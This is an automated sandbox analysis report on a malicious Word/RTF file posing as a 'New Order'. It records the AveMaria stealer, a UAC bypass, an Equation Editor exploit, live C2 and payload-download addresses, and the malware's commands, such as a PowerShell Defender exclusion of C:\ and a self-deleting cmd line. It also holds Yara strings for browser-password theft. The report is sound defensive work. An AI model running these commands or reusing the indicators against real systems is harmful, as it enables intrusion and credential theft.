Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New Order ( MY 01-22-DTHI .doc

Overview

General Information

Sample Name:New Order ( MY 01-22-DTHI .doc
Analysis ID:679658
MD5:ae55aaa571fd4f87839cb1ebc9706d32
SHA1:f7dab7f7f3556fe38a001dba46c9e93d4ffbf32b
SHA256:49235a707a23701651de637ce90e530247dcf6877001f416aa459a9bb0a22daa
Tags:doc
Infos:

Detection

AveMaria, UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Initial sample is an obfuscated RTF file
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Found stalling execution ending in API Sleep call
Allocates memory in foreign processes
Office equation editor drops PE file
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Writes to foreign memory regions
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Contains functionality to steal e-mail passwords
Contains functionality to steal Chrome passwords or cookies
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Contains functionality to inject threads in other processes
Contains functionality to create new users
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Contains functionality to download and execute PE files
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Installs a raw input device (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Office Equation Editor has been started
Contains functionality to download and launch executables
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 772 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1036 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • fiftikmernk852317.exe (PID: 912 cmdline: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe MD5: 5AE8471C10CDB2A59B950E66F8CA8A46)
      • powershell.exe (PID: 1468 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • cmd.exe (PID: 2512 cmdline: C:\Windows\System32\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
  • fiftikmernk852317.exe (PID: 1420 cmdline: "C:\Users\user\AppData\Roaming\fiftikmernk852317.exe" MD5: 5AE8471C10CDB2A59B950E66F8CA8A46)
  • cleanup

Malware Configuration

Threatname: AveMaria

{"C2 url": "76.8.53.133", "port": 1198}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
New Order ( MY 01-22-DTHI .docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x12ac:$obj1: \objhtml
  • 0x12d1:$obj2: \objdata
  • 0x12f2:$obj2: \objdata
  • 0x15c4:$obj3: \objupdate

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
      00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_AveMaria_31d2bce9unknownunknown
      • 0x31d8:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
      • 0x7be0:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
      • 0x1a20:$a2: SMTP Password
      • 0x6428:$a2: SMTP Password
      • 0xc60:$a3: select signon_realm, origin_url, username_value, password_value from logins
      • 0x5668:$a3: select signon_realm, origin_url, username_value, password_value from logins
      • 0x30e0:$a5: for /F "usebackq tokens=*" %%A in ("
      • 0x7ae8:$a5: for /F "usebackq tokens=*" %%A in ("
      • 0x1450:$a6: \Torch\User Data\Default\Login Data
      • 0x5e58:$a6: \Torch\User Data\Default\Login Data
      • 0x1fbc:$a8: "os_crypt":{"encrypted_key":"
      • 0x69c4:$a8: "os_crypt":{"encrypted_key":"
      • 0x18e8:$a10: \logins.json
      • 0x62f0:$a10: \logins.json
      • 0x1f34:$a11: Accounts\Account.rec0
      • 0x693c:$a11: Accounts\Account.rec0
      • 0x7f8:$a12: warzone160
      • 0x5200:$a12: warzone160
      • 0x2e88:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
      • 0x7890:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
      00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
          Click to see the 22 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.3.fiftikmernk852317.exe.4ce9f8.3.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
          • 0x2318:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          5.3.fiftikmernk852317.exe.4ce9f8.3.raw.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
          • 0x2318:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          • 0x2318:$c1: Elevation:Administrator!new:
          5.3.fiftikmernk852317.exe.4ce9f8.3.raw.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
            5.2.fiftikmernk852317.exe.24389af.3.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
            • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
            5.2.fiftikmernk852317.exe.24389af.3.raw.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
            • 0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
            • 0xd80:$c1: Elevation:Administrator!new:
            Click to see the 37 entries

            Sigma Signatures

            Exploits

            barindex
            Sigma detected: EQNEDT32.EXE connecting to internet
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 208.67.105.179, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1036, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49178
            Sigma detected: File Dropped By EQNEDT32EXE
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1036, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fifthikmerozx[1].exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://208.67.105.179/fifthikmerozx.exejAvira URL Cloud: Label: malware
            Source: 76.8.53.133Avira URL Cloud: Label: malware
            Source: http://208.67.105.179/fifthikmerozx.exerrC:Avira URL Cloud: Label: malware
            Source: http://208.67.105.179/fifthikmerozx.exe.Avira URL Cloud: Label: malware
            Source: http://208.67.105.179/fifthikmerozx.exeAvira URL Cloud: Label: malware
            Source: http://208.67.105.179/fifthikmerozx.exelateC:Avira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeAvira: detection malicious, Label: TR/AD.MortyStealer.obmwc
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fifthikmerozx[1].exeAvira: detection malicious, Label: TR/AD.MortyStealer.obmwc
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmpAvira: detection malicious, Label: EXP/CVE-2018-0798.Gen
            Multi AV Scanner detection for submitted file
            Source: New Order ( MY 01-22-DTHI .docVirustotal: Detection: 42%Perma Link
            Source: New Order ( MY 01-22-DTHI .docMetadefender: Detection: 42%Perma Link
            Source: New Order ( MY 01-22-DTHI .docReversingLabs: Detection: 47%
            Antivirus / Scanner detection for submitted sample
            Source: New Order ( MY 01-22-DTHI .docAvira: detected
            Yara detected AveMaria stealer
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Multi AV Scanner detection for domain / URL
            Source: 76.8.53.133Virustotal: Detection: 10%Perma Link
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fifthikmerozx[1].exeReversingLabs: Detection: 57%
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeReversingLabs: Detection: 57%
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpackAvira: Label: TR/Patched.Ren.Gen3
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpackAvira: Label: TR/Redcap.ghjpt
            Source: 8.2.cmd.exe.2930000.0.unpackAvira: Label: TR/Patched.Gen
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpackMalware Configuration Extractor: AveMaria {"C2 url": "76.8.53.133", "port": 1198}
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009AB15E lstrlenA,CryptStringToBinaryA,lstrcpyA,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009ACAFC CryptUnprotectData,LocalAlloc,LocalFree,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009ACCB4 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009ACC54 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009AA632 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009ACF58 LocalAlloc,BCryptDecrypt,LocalFree,

            Exploits

            barindex
            Yara detected UACMe UAC Bypass tool
            Source: Yara matchFile source: 5.3.fiftikmernk852317.exe.4ce9f8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.24389af.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.3.fiftikmernk852317.exe.4cff90.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.3.fiftikmernk852317.exe.4cd188.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180455880.0000000000AEF000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.980168722.00000000004CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.980064261.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: fiftikmernk852317.exe PID: 912, type: MEMORYSTR
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe
            Office equation editor establishes network connection
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 208.67.105.179 Port: 80
            Source: ~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmp.0.drStream path '_1721281446/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdbAA source: powershell.exe, 00000006.00000002.993133071.00000000057CD000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: G??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.1468.35906984on.pdby.resources.exes.exeI.ni.dlle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\.Ne source: powershell.exe, 00000006.00000002.988242865.0000000000534000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbK source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdb^ source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009B002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009A9DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009AFF27 FindFirstFileW,FindNextFileW,
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
